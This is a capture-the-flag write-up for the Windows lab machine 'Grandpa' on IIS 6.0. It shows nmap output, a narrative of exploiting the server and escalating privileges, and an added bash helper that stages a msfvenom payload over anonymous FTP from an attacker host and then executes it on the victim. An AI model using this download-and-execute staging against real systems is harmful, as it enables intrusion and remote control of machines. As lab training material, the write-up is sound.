Grandpa
OS: Windows, Difficulty: Easy, IP: 10.10.10.14
Initial Enumeration
# Nmap 7.70 scan initiated Sat Jul 20 14:38:04 2019 as: nmap -sV -sC -O -A -p 80 -oN O-detailed 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unkown
| Server Date: Sat, 20 Jul 2019 09:01:36 GMT
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 230.48 ms 10.10.14.1
2 230.74 ms 10.10.10.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 14:38:23 2019 -- 1 IP address (1 host up) scanned in 18.76 seconds
Only the web-server port was open, so the obvious choice was to look at it, but it returned an error page with no information. I started smashing it with gobuster, dirbuster and dirb, got a few directories, and with a little study found out that it was running FrontPage 5.X.Y.Z. I tried some exploits, but they didn't seem to work. So I attacked the IIS 6.0 server itself; apparently none of the MSF modules worked for me, so I chose the manual route and used the exploit mentioned below to get a low-privileged shell.
Now the plan of action was to upgrade this shell to NT AUTHORITY\SYSTEM, as this shell didn't even get me the user flag. I tried running Windows Exploit Suggester and tried many exploits without Metasploit, but they didn't seem to work. They should have, but to no avail, they didn't work for me.
The next plan of action was to upgrade the current shell to meterpreter to get better control. The main struggle was how to upload and execute my msfvenom payload. After a little research I learned that FTP can be used for this task; however, the shell was unstable, so I could not send commands as usual, but ftp had me covered here.
Start your own FTP server using twistd. Its FTP plugin allows anonymous logins by default, so the victim needs no credentials.
On the Windows box, I created a file with all the FTP commands that would fetch my payload and put it into the current directory (I chose %TEMP%).
Now run these commands non-interactively by passing that file to ftp with its script flag, so nothing has to be typed into the fragile shell while the transfer runs.
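The three steps above as one added bash helper; this is not code from the original writeup. It assumes an attacker address of 10.10.14.5 and a payload named rev.exe already built with msfvenom into ./ftproot (both placeholders). The attacker-side command is twistd's FTP plugin, as the writeup describes; the victim-side lines are plain cmd.exe and ftp.exe syntax, printed so they can be pasted one at a time into an unreliable shell. The helper also guards against a cmd.exe quirk that silently breaks such scripts: a digit glued to a redirection operator is read as a file-handle number.

```shell
#!/usr/bin/env bash
# Added example (not code from the original writeup): stage a payload over
# FTP when the victim's shell is too fragile for an interactive ftp session.
# Assumed names: attacker LHOST 10.10.14.5, payload rev.exe already built with
# msfvenom into ./ftproot. Run with --print-cmds to emit the victim-side lines.
set -eu

# Attacker side: twistd's ftp plugin serves a directory and accepts anonymous
# logins by default. -n keeps it in the foreground so each RETR is logged.
# Not invoked below because it blocks; run it in a second terminal.
start_ftp_server() {
    local root="$1" port="${2:-21}"
    twistd -n ftp -p "$port" -r "$root"
}

# The ftp command file that ftp.exe replays with -s:. Because -n disables
# auto-login, the user name and password are the next two lines; twistd
# accepts any password for the anonymous user. binary avoids mangling the .exe.
ftp_script_lines() {
    local lhost="$1" payload="$2" port="${3:-21}"
    printf '%s\n' "open $lhost $port" anonymous anything binary "get $payload" bye
}

# cmd.exe lines to type one at a time into the victim shell: each appends one
# ftp command to the script file, then ftp.exe replays the file.
# The space before every > and >> is deliberate: cmd.exe reads a digit glued
# to > as a file-handle number, so "echo open 10.10.14.5 21>ftp.txt" writes
# "open 10.10.14.5 2" and redirects handle 1 instead of the intended text.
victim_cmds() {
    local lhost="$1" payload="$2" port="${3:-21}" f="ftp.txt" redir='>'
    echo 'cd %TEMP%'
    ftp_script_lines "$lhost" "$payload" "$port" | while IFS= read -r line; do
        echo "echo $line $redir $f"
        redir='>>'            # first line creates the file, the rest append
    done
    echo "ftp -v -n -s:$f"    # -v quiet replies, -n no auto-login, -s: script
    echo "$payload"           # finally execute the dropped payload
}

# Sanity check for hand-edited variants read from stdin: fail if any line has
# a digit immediately before a redirection operator.
check_no_handle_redirect() {
    ! grep -q '[0-9]>'
}

if [ "${1:-}" = "--print-cmds" ]; then
    victim_cmds "${2:-10.10.14.5}" "${3:-rev.exe}" "${4:-21}"
fi
```

In one terminal run `start_ftp_server ./ftproot` (port 21 needs root; pass 2121 as the second argument and the same port as the third argument of `--print-cmds` otherwise), then paste the output of `bash stage_ftp.sh --print-cmds 10.10.14.5 rev.exe` into the victim shell line by line. The last printed line runs the payload from %TEMP% once the `get` has completed.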
This got me my payload on the box, and now I ran the payload to get a meterpreter shell.
However, even with the SYSTEM meterpreter shell I was not able to interact with the shells, so I had to migrate to another process and launch a shell again to get interaction.
User Own
Root Own
Learning Outcome
Learned quite a bunch from this box: how to target known vulnerabilities first rather than hunting down my own, how to use FTP to transfer files, and the instability of exploits, since something may work for somebody but may not work for you. Overall a fun box.